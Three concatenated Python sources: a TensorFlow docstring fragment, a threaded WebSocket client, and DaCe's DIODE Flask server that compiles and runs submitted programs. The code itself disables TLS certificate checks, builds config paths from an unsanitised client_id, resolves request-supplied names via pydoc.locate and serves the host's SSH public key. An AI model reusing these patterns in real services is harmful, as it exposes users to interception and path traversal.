If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
|
websocket_client.py
|
# encoding: UTF-8
import json
import ssl
import sys
import traceback
import socket
from datetime import datetime
from threading import Lock, Thread
from time import sleep
import websocket
class WebsocketClient(object):
"""
Websocket API
After creating the client object, use start() to run worker and ping threads.
The worker thread connects websocket automatically.
Use stop to stop threads and disconnect websocket before destroying the client
object (especially when exiting the programme).
Default serialization format is json.
Callbacks to overrides:
* unpack_data
* on_connected
* on_disconnected
* on_packet
* on_error
After start() is called, the ping thread will ping server every 60 seconds.
If you want to send anything other than JSON, override send_packet.
"""
def __init__(self):
"""Constructor"""
self.host = None
self._ws_lock = Lock()
self._ws = None
self._worker_thread = None
self._ping_thread = None
self._active = False
self.proxy_host = None
self.proxy_port = None
self.ping_interval = 60 # seconds
self.header = {}
# For debugging
self._last_sent_text = None
self._last_received_text = None
def init(self, host: str, proxy_host: str = "", proxy_port: int = 0, ping_interval: int = 60, header: dict = None):
"""
:param ping_interval: unit: seconds, type: int
"""
self.host = host
self.ping_interval = ping_interval # seconds
if header:
self.header = header
if proxy_host and proxy_port:
self.proxy_host = proxy_host
self.proxy_port = proxy_port
def start(self):
"""
Start the client and on_connected function is called after webscoket
is connected succesfully.
Please don't send packet untill on_connected fucntion is called.
"""
self._active = True
self._worker_thread = Thread(target=self._run)
self._worker_thread.start()
self._ping_thread = Thread(target=self._run_ping)
self._ping_thread.start()
def stop(self):
"""
Stop the client.
"""
self._active = False
self._disconnect()
def join(self):
"""
Wait till all threads finish.
This function cannot be called from worker thread or callback function.
"""
self._ping_thread.join()
self._worker_thread.join()
def send_packet(self, packet: dict):
"""
Send a packet (dict data) to server
override this if you want to send non-json packet
"""
text = json.dumps(packet)
self._record_last_sent_text(text)
return self._send_text(text)
def _send_text(self, text: str):
"""
Send a text string to server.
"""
ws = self._ws
if ws:
ws.send(text, opcode=websocket.ABNF.OPCODE_TEXT)
def _send_binary(self, data: bytes):
"""
Send bytes data to server.
"""
ws = self._ws
if ws:
ws._send_binary(data)
def _reconnect(self):
""""""
if self._active:
self._disconnect()
self._connect()
def _create_connection(self, *args, **kwargs):
""""""
return websocket.create_connection(*args, **kwargs)
def _connect(self):
""""""
self._ws = self._create_connection(
self.host,
sslopt={"cert_reqs": ssl.CERT_NONE},
http_proxy_host=self.proxy_host,
http_proxy_port=self.proxy_port,
header=self.header
)
self.on_connected()
def _disconnect(self):
"""
"""
with self._ws_lock:
if self._ws:
self._ws.close()
self._ws = None
def _run(self):
"""
Keep running till stop is called.
"""
try:
self._connect()
# todo: onDisconnect
while self._active:
try:
ws = self._ws
if ws:
text = ws.recv()
# ws object is closed when recv function is blocking
if not text:
self._reconnect()
continue
self._record_last_received_text(text)
try:
data = self.unpack_data(text)
except ValueError as e:
print("websocket unable to parse data: " + text)
raise e
self.on_packet(data)
# ws is closed before recv function is called
# For socket.error, see Issue #1608
except (websocket.WebSocketConnectionClosedException, socket.error):
self._reconnect()
# other internal exception raised in on_packet
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
self._reconnect()
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
self._reconnect()
@staticmethod
def unpack_data(data: str):
"""
Default serialization format is json.
override this method if you want to use other serialization format.
"""
return json.loads(data)
def _run_ping(self):
""""""
while self._active:
try:
self._ping()
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
self._reconnect()
for i in range(self.ping_interval):
if not self._active:
break
sleep(1)
def _ping(self):
""""""
ws = self._ws
if ws:
ws.send("ping", websocket.ABNF.OPCODE_PING)
@staticmethod
def on_connected():
"""
Callback when websocket is connected successfully.
"""
pass
@staticmethod
def on_disconnected():
"""
Callback when websocket connection is lost.
"""
pass
@staticmethod
def on_packet(packet: dict):
"""
Callback when receiving data from server.
"""
pass
def on_error(self, exception_type: type, exception_value: Exception, tb):
"""
Callback when exception raised.
"""
sys.stderr.write(
self.exception_detail(exception_type, exception_value, tb)
)
return sys.excepthook(exception_type, exception_value, tb)
def exception_detail(
self, exception_type: type, exception_value: Exception, tb
):
"""
Print detailed exception information.
"""
text = "[{}]: Unhandled WebSocket Error:{}\n".format(
datetime.now().isoformat(), exception_type
)
text += "LastSentText:\n{}\n".format(self._last_sent_text)
text += "LastReceivedText:\n{}\n".format(self._last_received_text)
text += "Exception trace: \n"
text += "".join(
traceback.format_exception(exception_type, exception_value, tb)
)
return text
def _record_last_sent_text(self, text: str):
"""
Record last sent text for debug purpose.
"""
self._last_sent_text = text[:1000]
def _record_last_received_text(self, text: str):
"""
Record last received text for debug purpose.
"""
self._last_received_text = text[:1000]
|
diode_server.py
|
#!flask/bin/python
# Copyright 2019-2020 ETH Zurich and the DaCe authors. All rights reserved.
import aenum
import dace
import dace.serialize
import dace.frontend.octave.parse as octave_frontend
from dace.codegen import codegen
from diode.DaceState import DaceState
from dace.transformation.optimizer import SDFGOptimizer
from dace.transformation.transformation import Transformation
from dace.sdfg.nodes import LibraryNode
import inspect
from flask import Flask, Response, request, redirect, url_for, abort, jsonify, send_from_directory, send_file
import json
import copy
import multiprocessing
import re
from diode.remote_execution import AsyncExecutor
import traceback
import os
import pydoc
import threading
import queue
import time
app = Flask(__name__)
# Prepare a whitelist of DaCe enumeration types
enum_list = [
typename
for typename, dtype in inspect.getmembers(dace.dtypes, inspect.isclass)
if issubclass(dtype, aenum.Enum)
]
es_ref = []
remote_execution = False
config_lock = threading.Lock()
RUNNING_TIMEOUT = 3
class ConfigCopy:
"""
Copied Config for passing by-value
"""
def __init__(self, config_values):
self._config = config_values
def get(self, *key_hierarchy):
current_conf = self._config
for key in key_hierarchy:
current_conf = current_conf[key]
return current_conf
def get_bool(self, *key_hierarchy):
from dace.config import _env2bool
res = self.get(*key_hierarchy)
if isinstance(res, bool):
return res
return _env2bool(str(res))
def set(self, *key_hierarchy, value=None, autosave=False):
raise Exception("ConfigCopy does not allow setting values!")
def save(self, path=None):
""" Nonstatic version of Config::save()
"""
if path is None:
path = Config._cfg_filename
# Write configuration file
with open(path, 'w') as f:
import yaml
yaml.dump(self._config, f, default_flow_style=False)
class ExecutorServer:
"""
Implements a server scheduling execution of dace programs
"""
def __init__(self):
self._command_queue = queue.Queue(
) # Fast command queue. Must be polled often (< 30 ms response time)
self._executor_queue = queue.Queue(
) # Run command queue. Latency not critical
_self = self
def helper():
_self.loop()
def ehelper():
_self.executorLoop()
self._task_dict = {}
self._run_num = 0
self._running = True
self._thread = threading.Thread(target=helper, daemon=True)
self._thread.start()
self._executor_thread = threading.Thread(target=ehelper, daemon=True)
self._executor_thread.start()
self._current_runs = {}
self._orphaned_runs = {}
self._oplock = threading.Lock()
self._run_cv = threading.Condition(
) # Used to trickle run tasks through (as the tasks are run in a thread)
self._slot_available = True # True if the target machine has a slot for running a program
self._perfdata_available = {} # Dict mapping client_id => .can-path
self._ticket_counter = 0
self._command_results = {} # Dict mapping ticket => command result
def executorLoop(self):
while self._running:
self.consume_programs()
def loop(self):
while self._running:
self.consume()
def waitForCommand(self, ticket):
while True:
try:
with self._oplock:
ret = self._command_results[ticket]
del self._command_results[ticket]
except:
time.sleep(2)
continue
return ret
def addCommand(self, cmd):
with self._oplock:
cmd['ticket'] = self._ticket_counter
self._ticket_counter += 1
self._command_queue.put(cmd)
print("Added command to queue")
return cmd['ticket']
def consume_programs(self):
try:
cmd = self._executor_queue.get(timeout=3)
if cmd['cmd'] == "run":
while True:
with self._run_cv:
if self._slot_available:
break
import time
time.sleep(0.5)
with self._run_cv:
self._slot_available = False
print("Running task")
self._task_dict[cmd['index']]['state'] = 'running'
runner = self.run(
cmd['cot'], {
'index': cmd['index'],
'config_path': cmd['config_path'],
'client_id': cmd['cid'],
'reset-perfdata': cmd['reset-perfdata'],
'perfopts': cmd['opt']['perfopts']
})
print("Wait for oplock")
with self._oplock:
self._current_runs[cmd['cid']] = runner
import time
# Wait a predefined time for clients to catch up on the outputs
time.sleep(RUNNING_TIMEOUT)
with self._oplock:
run_locally = True
try:
x = self._current_runs[cmd['cid']]
except:
run_locally = False
if run_locally:
print("running locally")
def tmp():
with self._oplock:
del self._current_runs[cmd['cid']]
try:
c = self._orphaned_runs[cmd['cid']]
except:
self._orphaned_runs[cmd['cid']] = []
self._orphaned_runs[cmd['cid']].append([])
print("Starting runner")
for x in runner():
self._orphaned_runs[cmd['cid']][-1] += x
# Because this holds locks (and the output should be generated even if nobody asks for it immediately), this is run when the timeout for direct interception expires
tmp()
elif cmd['cmd'] == 'control':
# Control operations that must be synchronous with execution (e.g. for cleanup, storage operations)
with self._oplock:
self._task_dict[cmd['index']]['state'] = 'running'
if cmd['operation'] == 'startgroup':
pass
elif cmd['operation'] == 'remove_group':
pass
elif cmd['operation'] == 'endgroup':
pass
with self._oplock:
del self._task_dict[cmd['index']]
except queue.Empty:
return
def consume(self):
try:
cmd = self._command_queue.get(timeout=3)
if isinstance(cmd, str):
pass
else:
command = cmd['cmd']
print("Got command " + command)
except queue.Empty:
return
def getExecutionOutput(self, client_id):
import time
ret = None
err_count = 0
while ret is None:
with self._oplock:
try:
ret = self._current_runs[client_id]
del self._current_runs[client_id]
except:
err_count += 1
if err_count < 20: # Give 20 seconds of space for compilation and distribution
time.sleep(1)
continue
def egen():
yield "ERROR: Failed to get run reference"
return egen
return ret
def stop(self):
self._running = False
def lock(self):
self._oplock.acquire()
def unlock(self):
self._oplock.release()
@staticmethod
def getPerfdataDir(client_id):
if not os.path.isdir("perfdata-dir/"):
os.mkdir("perfdata-dir")
tpath = "perfdata-dir/" + client_id
try:
os.mkdir(tpath)
except:
pass
perf_tmp_dir = tpath
return perf_tmp_dir
def addRun(self, client_id, compilation_output_tuple, more_options):
config_path = "./client_configs/" + client_id + ".conf"
if not os.path.isdir("./client_configs/"):
os.mkdir("./client_configs/")
if not os.path.isfile(config_path):
# Config not (yet) available, load default and copy
with config_lock:
from dace.config import Config
Config.load()
Config.save(config_path)
if isinstance(compilation_output_tuple, str):
# Group command
gc = compilation_output_tuple
val = {
'cid': client_id,
'cmd': 'control',
'index': self._run_num,
'operation': None,
'config_path': config_path,
'state': "pending"
}
if gc == "start":
val['operation'] = 'startgroup'
elif gc == "end":
val['operation'] = 'endgroup'
else:
def g():
yield '{ "error": "Unknown group operation" }'
return g
with self._oplock:
self._executor_queue.put(val)
self._task_dict[self._run_num] = val
self._run_num += 1
return
with self._oplock:
val = {
'index': self._run_num,
'type': 'run',
'cid': client_id,
'config_path': config_path,
'cmd': 'run',
'cot': compilation_output_tuple,
'opt': more_options,
'state': 'pending',
'reset-perfdata': False
}
self._executor_queue.put(val)
self._task_dict[self._run_num] = val
self._run_num += 1
def error_gen():
yield '{ "error": "Run was scheduled. Please poll until ready or longpoll." }'
return error_gen
def run(self, cot, options):
print("=> Run called")
print("Options: " + str(options))
compilation_output_tuple = cot
runindex = options['index']
config_path = options['config_path']
sdfgs, code_tuples, dace_state = compilation_output_tuple
# Passes output through HTTP1.1 streaming (using yield)
def runner():
print("Trying to get lock")
with self._run_cv:
yield "Run starting\n"
with config_lock:
from dace.config import Config
Config.load(config_path)
# Copy the config - this allows releasing the config lock
# without suffering from potential side effects
copied_config = ConfigCopy(Config._config)
self._slot_available = False
dace_state.set_is_compiled(False)
terminal_queue = multiprocessing.Queue()
async_executor = AsyncExecutor(remote=remote_execution)
async_executor.autoquit = True
async_executor.executor.output_queue = terminal_queue
async_executor.executor.set_config(copied_config)
async_executor.run_async(dace_state)
async_executor.to_proc_message_queue.put("forcequit")
while async_executor.running_proc.is_alive():
try:
new = terminal_queue.get(timeout=1)
yield new
except:
# Check if the sub-process is still running
continue
# Flush remaining outputs
while not terminal_queue.empty():
new = terminal_queue.get(timeout=1)
yield new
with self._oplock:
# Delete from the tasklist
del self._task_dict[runindex]
# Output instrumentation report, if exists
if (async_executor.running_proc.exitcode == 0
and dace_state.sdfg.is_instrumented()):
report = dace_state.sdfg.get_latest_report()
yield '\nInstrumentation report:\n%s\n\n' % report
yield ('Run finished with exit code %d' %
async_executor.running_proc.exitcode)
self._slot_available = True
return runner
@app.route('/')
def redirect_base():
return redirect(url_for("index", path="index.html"), code=301)
@app.route('/webclient/<path:path>', methods=['GET'])
def index(path):
"""
This is an http server (on the same port as the REST API).
It serves the files from the 'webclient'-directory to user agents.
Note: This is NOT intended for production environments and security is disregarded!
"""
return send_from_directory(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "webclient"),
path)
@app.route('/dace/api/v1.0/getPubSSH/', methods=['GET'])
def getPubSSH():
try:
with open(os.path.expanduser("~/.ssh/id_rsa.pub")) as f:
key = f.read()
return jsonify({"pubkey": key})
except:
print("Failed to open keyfile")
traceback.print_exc()
return jsonify({"pubkey": "0"})
@app.route('/dace/api/v1.0/getEnum/<string:name>', methods=['GET'])
def getEnum(name):
"""
Helper function to enumerate available values for `ScheduleType`.
Returns:
enum: List of string-representations of the values in the enum
"""
valid_params = enum_list
if name not in valid_params:
# To protect against arbitrary code execution, this request is refused
print("Enum type '" + str(name) + "' is not in Whitelist")
abort(400)
return jsonify(
{'enum': [str(e).split(".")[-1] for e in getattr(dace.dtypes, name)]})
@app.route('/dace/api/v1.0/getLibImpl/<string:name>', methods=['GET'])
def get_library_implementations(name):
"""
Helper function to enumerate available implementations for a given
library node.
Returns:
enum: List of string-representations of implementations
"""
cls = pydoc.locate(name)
if cls is None:
return jsonify([])
return jsonify(list(cls.implementations.keys()))
@app.route('/dace/api/v1.0/expand/', methods=['POST'])
def expand_node_or_sdfg():
"""
Performs expansion of a single library node or an entire SDFG.
Fields:
sdfg (required): SDFG as JSON
nodeid (not required): A list of: [SDFG ID, state ID, node ID]
"""
try:
sdfg = dace.SDFG.from_json(request.json['sdfg'])
except KeyError:
return jsonify({'error': 'SDFG not given'})
try:
sdfg_id, state_id, node_id = request.json['nodeid']
except KeyError:
sdfg_id, state_id, node_id = None, None, None
if sdfg_id is None:
sdfg.expand_library_nodes()
else:
context_sdfg = sdfg.sdfg_list[sdfg_id]
state = context_sdfg.node(state_id)
node = state.node(node_id)
if isinstance(node, LibraryNode):
node.expand(context_sdfg, state)
else:
return jsonify({'error': 'The given node is not a library node'})
return jsonify({'sdfg': sdfg.to_json()})
def collect_all_SDFG_nodes(sdfg):
ret = []
for sid, state in enumerate(sdfg.nodes()):
for nid, node in enumerate(state.nodes()):
ret.append(('s' + str(sid) + '_' + str(nid), node))
return ret
def split_nodeid_in_state_and_nodeid(nodeid):
match = re.match(r"s(\d+)_(\d+)", nodeid)
if match:
ids = match.groups()
return int(ids[0]), int(ids[1])
else:
match = re.match(r"dummy_(\d+)", nodeid)
if match:
ids = match.groups()
return int(ids[0]), None
else:
raise ValueError("Node ID " + nodeid + " has the wrong form")
return None
def properties_to_json_list(props):
ret = []
for x, val in props:
try:
typestr = x.dtype.__name__
except:
# Try again, it might be an enum
try:
typestr = x.enum.__name__
except:
typestr = 'None'
# Special case of CodeProperty
if isinstance(x, dace.properties.CodeProperty):
typestr = "CodeProperty"
if val is None:
continue
val = x.to_string(val)
# Special case of DebugInfoProperty: Transcribe to object (this is read-only)
if isinstance(x, dace.properties.DebugInfoProperty):
typestr = "DebugInfo"
if val is None:
continue
nval = {
"filename": val.filename,
"start_line": val.start_line,
"end_line": val.end_line,
"start_col": val.start_column,
"end_col": val.end_column
}
val = json.dumps(nval)
ret.append({
"name": str(x.attr_name),
"desc": str(x.desc),
"type": typestr,
"default": str(x.default),
"value": str(val)
})
return ret
def applySDFGProperty(sdfg, property_element, step=None):
try:
prop_step = int(property_element['step'])
except:
print("[Warning] Prop step was not provided")
prop_step = 0
print("applySDFGProperty: step " + str(step) + ", prop_step: " +
str(prop_step))
if step is not None and prop_step != step:
# Step mismatch; ignore
return sdfg
sid = int(property_element['state_id'])
nid = int(property_element['node_id'])
node = sdfg.node(sid).node(nid)
for prop in property_element['params']:
dace.serialize.set_properties_from_json(node, prop, context=sdfg)
return sdfg
def applySDFGProperties(sdfg, properties, step=None):
for x in properties:
applySDFGProperty(sdfg, x, step)
return sdfg
def applyOptPath(sdfg, optpath, useGlobalSuffix=True, sdfg_props=None):
# Iterate over the path, applying the transformations
global_counter = {}
sdfg_props = sdfg_props or []
step = 0
for x in optpath:
optimizer = SDFGOptimizer(sdfg, inplace=True)
name = x['name']
classname = name[:name.index('$')] if name.find('$') >= 0 else name
transformation = next(t for t in Transformation.extensions().keys()
if t.__name__ == classname)
matching = optimizer.get_pattern_matches(patterns=[transformation])
# Apply properties (will automatically apply by step-matching)
sdfg = applySDFGProperties(sdfg, sdfg_props, step)
for pattern in matching:
name = type(pattern).__name__
tsdfg = sdfg.sdfg_list[pattern.sdfg_id]
if useGlobalSuffix:
if name in global_counter:
global_counter[name] += 1
else:
global_counter[name] = 0
tmp = global_counter[name]
if tmp > 0:
name += "$" + str(tmp)
if name == x['name']:
#for prop in x['params']['props']:
#if prop['name'] == 'subgraph': continue
#set_properties_from_json(pattern, prop, sdfg)
dace.serialize.set_properties_from_json(pattern,
x['params']['props'],
context=sdfg)
pattern.apply_pattern(tsdfg)
if not useGlobalSuffix:
break
step += 1
sdfg = applySDFGProperties(sdfg, sdfg_props, step)
return sdfg
def create_DaceState(code, sdfg_dict, errors):
dace_state = None
try:
dace_state = DaceState(code, "fake.py", remote=remote_execution)
for x in dace_state.sdfgs:
name, sdfg = x
sdfg_dict[name] = sdfg
return dace_state
except SyntaxError as se:
# Syntax error
errors.append({
'type': "SyntaxError",
'line': se.lineno,
'offset': se.offset,
'text': se.text,
'msg': se.msg
})
except ValueError as ve:
# DACE-Specific error
tb = traceback.format_exc()
errors.append({
'type': "ValueError",
'stringified': str(ve),
'traceback': tb
})
except Exception as ge:
# Generic exception
tb = traceback.format_exc()
errors.append({
'type': ge.__class__.__name__,
'stringified': str(ge),
'traceback': tb
})
return dace_state
def compileProgram(request, language, perfopts=None):
if not request.json or (('code' not in request.json) and
('sdfg' not in request.json)):
print("[Error] No input code provided, cannot continue")
abort(400)
errors = []
try:
optpath = request.json['optpath']
except:
optpath = None
try:
sdfg_props = request.json['sdfg_props']
except:
sdfg_props = None
if perfopts is None:
try:
perf_mode = request.json['perf_mode']
except:
perf_mode = None
else:
#print("Perfopts: " + str(perfopts))
perf_mode = perfopts
client_id = request.json['client_id']
sdfg_dict = {}
sdfg_eval_order = []
with config_lock: # Lock the config - the config may be modified while holding this lock, but the config MUST be restored.
from dace.config import Config
config_path = "./client_configs/" + client_id + ".conf"
if os.path.isfile(config_path):
Config.load(config_path)
else:
Config.load()
dace_state = None
in_sdfg = None
if "sdfg" in request.json:
in_sdfg = request.json['sdfg']
if isinstance(in_sdfg, list):
if len(in_sdfg) > 1:
# TODO: Allow multiple sdfg inputs
raise NotImplementedError("More than 1 SDFG provided")
in_sdfg = in_sdfg[0]
if isinstance(in_sdfg, str):
in_sdfg = json.loads(in_sdfg)
if isinstance(in_sdfg, dict):
# Generate callbacks (needed for elements referencing others)
def loader_callback(name: str):
# Check if already available and if yes, return it
if name in sdfg_dict:
return sdfg_dict[name]
# Else: This function has to recreate the given sdfg
sdfg_dict[name] = dace.SDFG.from_json(
in_sdfg[name], {
'sdfg': None,
'callback': loader_callback
})
sdfg_eval_order.append(name)
return sdfg_dict[name]
for k, v in in_sdfg.items():
# Leave it be if the sdfg was already created
# (this might happen with SDFG references)
if k in sdfg_dict: continue
if isinstance(v, str):
v = json.loads(v)
sdfg_dict[k] = dace.SDFG.from_json(
v, {
'sdfg': None,
'callback': loader_callback
})
sdfg_eval_order.append(k)
else:
in_sdfg = dace.SDFG.from_json(in_sdfg)
sdfg_dict[in_sdfg.name] = in_sdfg
else:
print("Using code to compile")
code = request.json['code']
if (isinstance(code, list)):
if len(code) > 1:
print("More than 1 code file provided!")
abort(400)
code = code[0]
if language == "octave":
statements = octave_frontend.parse(code, debug=False)
statements.provide_parents()
statements.specialize()
sdfg = statements.generate_code()
sdfg.set_sourcecode(code, "matlab")
elif language == "dace":
dace_state = create_DaceState(code, sdfg_dict, errors)
# The DaceState uses the variable names in the dace code. This is not useful enough for us, so we translate
copied_dict = {}
for k, v in sdfg_dict.items():
copied_dict[v.name] = v
sdfg_dict = copied_dict
if len(errors) == 0:
if optpath is not None:
for sdfg_name, op in optpath.items():
try:
sp = sdfg_props[sdfg_name]
except:
# In any error case, just ignore the properties
sp = None
print("Applying opts for " + sdfg_name)
print("Dict: " + str(sdfg_dict.keys()))
sdfg_dict[sdfg_name] = applyOptPath(sdfg_dict[sdfg_name],
op,
sdfg_props=sp)
code_tuple_dict = {}
# Deep-copy the SDFG (codegen may change the SDFG it operates on)
codegen_sdfgs = copy.deepcopy(sdfg_dict)
codegen_sdfgs_dace_state = copy.deepcopy(sdfg_dict)
if len(errors) == 0:
if sdfg_eval_order:
sdfg_eval = [(n, codegen_sdfgs[n])
for n in reversed(sdfg_eval_order)]
else:
sdfg_eval = codegen_sdfgs.items()
for n, s in sdfg_eval:
try:
if Config.get_bool('diode', 'general',
'library_autoexpand'):
s.expand_library_nodes()
code_tuple_dict[n] = codegen.generate_code(s)
except dace.sdfg.NodeNotExpandedError as ex:
code_tuple_dict[n] = [str(ex)]
except Exception: # Forward exception to output code
code_tuple_dict[n] = [
'Code generation failed:\n' + traceback.format_exc()
]
if dace_state is None:
if "code" in request.json:
in_code = request.json['code']
else:
in_code = ""
dace_state = DaceState(in_code, "tmp.py", remote=remote_execution)
dace_state.set_sdfg(
list(codegen_sdfgs_dace_state.values())[0],
list(codegen_sdfgs_dace_state.keys())[0])
if len(dace_state.errors) > 0:
print("ERRORS: " + str(dace_state.errors))
errors.extend(dace_state.errors)
# The config won't save back on its own, and we don't want it to - these changes are transient
if len(errors) > 0:
return errors
# Only return top-level SDFG
return ({k: v
for k, v in sdfg_dict.items()
if v.parent is None}, code_tuple_dict, dace_state)
#return sdfg_dict, code_tuple_dict, dace_state
def get_transformations(sdfgs):
opt_per_sdfg = {}
for sdfg_name, sdfg in sdfgs.items():
opt = SDFGOptimizer(sdfg)
ptrns = opt.get_pattern_matches()
optimizations = []
for p in ptrns:
label = type(p).__name__
nodeids = []
properties = []
if p is not None:
sdfg_id = p.sdfg_id
sid = p.state_id
nodes = list(p.subgraph.values())
for n in nodes:
nodeids.append([sdfg_id, sid, n])
properties = dace.serialize.all_properties_to_json(p)
optimizations.append({
'opt_name': label,
'opt_params': properties,
'affects': nodeids,
'children': []
})
opt_per_sdfg[sdfg_name] = {'matching_opts': optimizations}
return opt_per_sdfg
@app.route("/dace/api/v1.0/dispatcher/<string:op>/", methods=['POST'])
def execution_queue_query(op):
es = es_ref[0]
if op == "list":
# List the currently waiting tasks
retlist = []
for key, val in es._orphaned_runs.items():
tmp = [''.join(x) for x in val]
for x in tmp:
d = {}
d['index'] = '(done)'
d['type'] = 'orphan'
d['client_id'] = key
d['state'] = 'orphaned'
d['output'] = str(x)
retlist.append(d)
for key, val in es._task_dict.items():
d = {}
if val['cmd'] == 'run':
d['index'] = key
d['type'] = 'run'
d['client_id'] = val['cid']
d['options'] = val['opt']
d['state'] = val['state']
elif val['cmd'] == 'control':
d['index'] = key
d['type'] = 'command'
d['client_id'] = val['cid']
d['options'] = val['operation']
d['state'] = val['state']
retlist.append(d)
ret = {}
ret['elements'] = retlist
return jsonify(ret)
else:
print("Error: op " + str(op) + " not implemented")
abort(400)
@app.route('/dace/api/v1.0/run/status/', methods=['POST'])
def get_run_status():
if not request.json or not 'client_id' in request.json:
print("[Error] No client id provided, cannot continue")
abort(400)
es = es_ref[0]
# getExecutionOutput returns a generator to output to a HTTP1.1 stream
outputgen = es.getExecutionOutput(request.json['client_id'])
return Response(outputgen(), mimetype='text/text')
@app.route('/dace/api/v1.0/run/', methods=['POST'])
def run():
"""
This function is equivalent to the old DIODE "Run"-Button.
POST-Parameters:
(Same as for compile(), language defaults to 'dace')
perfmodes: list including every queried mode
corecounts: list of core counts (one run for every number of cores)
"""
try:
perfmodes = request.json['perfmodes']
except:
perfmodes = ["noperf"]
try:
corecounts = request.json['corecounts']
except:
corecounts = [0]
try:
repetitions = request.json['repetitions']
except:
repetitions = 1
# Obtain the reference
es = es_ref[0]
client_id = request.json['client_id']
es.addRun(client_id, "start", {})
for pmode in perfmodes:
perfopts = {
'mode': pmode,
'core_counts': corecounts,
'repetitions': repetitions
}
tmp = compileProgram(request, 'dace', perfopts)
if len(tmp) > 1:
sdfgs, code_tuples, dace_state = tmp
else:
# ERROR
print("An error occurred")
abort(400)
dace_state.repetitions = repetitions
more_options = {}
more_options['perfopts'] = perfopts
runner = es.addRun(client_id, (sdfgs, code_tuples, dace_state),
more_options)
es.addRun(client_id, "end", {})
# There is no state information with this, just the output
# It might be necessary to add a special field that the client has to filter out
# to provide additional state information
return Response(runner(), mimetype="text/text")
@app.route('/dace/api/v1.0/match_optimizer_patterns/', methods=['POST'])
def optimize():
"""
Returns a list of possible optimizations (transformations) and their properties.
POST-Parameters:
input_code: list. Contains all necessary input code files
optpath: list of dicts, as { name: <str>, params: <dict> }. Contains the current optimization path/tree.
This optpath is applied to the provided code before evaluating possible pattern matches.
client_id: For identification. May be unique across all runs,
must be unique across clients
:return: matching_opts: list of dicts, as { opt_name: <str>, opt_params: <dict>, affects: <list>, children: <recurse> }.
Contains the matching transformations.
`affects` is a list of affected node ids, which must be unique in the current program.
"""
tmp = compileProgram(request, 'dace')
if len(tmp) > 1:
sdfgs, code_tuples, dace_state = tmp
else:
# Error
return jsonify({'error': tmp})
opt_per_sdfg = get_transformations(sdfgs)
return jsonify(opt_per_sdfg)
@app.route('/dace/api/v1.0/compile/<string:language>', methods=['POST'])
def compile(language):
"""
POST-Parameters:
sdfg: ser. sdfg: Contains the root SDFG, serialized in JSON-string. If set, options `code` and `sdfg_props` are taken from this value.
Can be a list of SDFGs.
NOTE: If specified, `code`, `sdfg_prop`, and `language` (in URL) are ignored.
code: string/list. Contains all necessary input code files
[opt] optpath: list of dicts, as { <sdfg_name/str>: { name: <str>, params: <dict> }}. Contains the current optimization path/tree.
This optpath is applied to the provided code before compilation
[opt] sdfg_props: list of dicts, as { <sdfg_name/str>: { state_id: <str>, node_id: <str>, params: <dict>, step: <opt int>}}. Contains changes to the default SDFG properties.
The step element of the dicts is optional. If it is provided, it specifies the number
of optpath elements that preceed it. E.g. a step value of 0 means that the property is applied before the first optimization.
If it is omitted, the property is applied after all optimization steps, i.e. to the resulting SDFG
[opt] perf_mode: string. Providing "null" has the same effect as omission. If specified, enables performance instrumentation with the counter set
provided in the DaCe settings. If null (or omitted), no instrumentation is enabled.
client_id: <string>: For later identification. May be unique across all runs,
must be unique across clients
Returns:
sdfg: object. Contains a serialization of the resulting SDFGs.
generated_code: string. Contains the output code
sdfg_props: object. Contains a dict of all properties for
every existing node of the sdfgs returned
in the sdfg field
"""
tmp = None
try:
tmp = compileProgram(request, language)
if len(tmp) > 1:
sdfgs, code_tuples, dace_state = tmp
else:
# Error
return jsonify({'error': tmp})
opts = get_transformations(sdfgs)
compounds = {}
for n, s in sdfgs.items():
compounds[n] = {
"sdfg":
s.to_json(),
"matching_opts":
opts[n]['matching_opts'],
"generated_code":
[*map(lambda x: getattr(x, 'code', str(x)), code_tuples[n])]
}
return jsonify({"compounds": compounds})
except Exception as e:
return jsonify({'error': str(e), 'traceback': traceback.format_exc()})
@app.route('/dace/api/v1.0/diode/themes', methods=['GET'])
def get_available_ace_editor_themes():
import glob, os.path
path = "./webclient/external_lib/ace/"
files = [f for f in glob.glob(path + "theme-*.js")]
filenames = map(os.path.basename, files)
return jsonify([*filenames])
def get_settings(client_id, name="", cv=None, config_path=""):
from dace.config import Config
if cv is None:
clientpath = "./client_configs/" + client_id + ".conf"
if os.path.isfile(clientpath):
Config.load(clientpath)
else:
Config.load()
if cv is None:
cv = Config.get()
ret = {}
for i, (cname, cval) in enumerate(sorted(cv.items())):
cpath = tuple(list(config_path) + [cname])
try:
meta = Config.get_metadata(*cpath)
# A dict contains more elements
if meta['type'] == 'dict':
ret[cname] = {
"value": get_settings(client_id, cname, cval, cpath),
"meta": meta
}
continue
# Other values can be included directly
ret[cname] = {"value": cval, "meta": meta}
except KeyError:
print('WARNING: No metadata for configuration key', cpath)
return ret
def set_settings(settings_array, client_id):
from dace.config import Config
if not os.path.isdir("./client_configs"):
os.mkdir("./client_configs/")
clientpath = "./client_configs/" + client_id + ".conf"
if os.path.isfile(clientpath):
Config.load(clientpath)
else:
Config.load()
for path, val in settings_array.items():
path = path.split("/")
Config.set(*path, value=val)
Config.save(clientpath)
return Config.get()
@app.route('/dace/api/v1.0/preferences/<string:operation>', methods=['POST'])
def diode_settings(operation):
if operation == "get":
client_id = request.json['client_id']
return jsonify(get_settings(client_id))
elif operation == "set":
print("request.data: " + str(request.data))
settings = request.json
client_id = settings['client_id']
del settings['client_id']
return jsonify(set_settings(settings, client_id))
else:
return jsonify({"error": "Unsupported operation"})
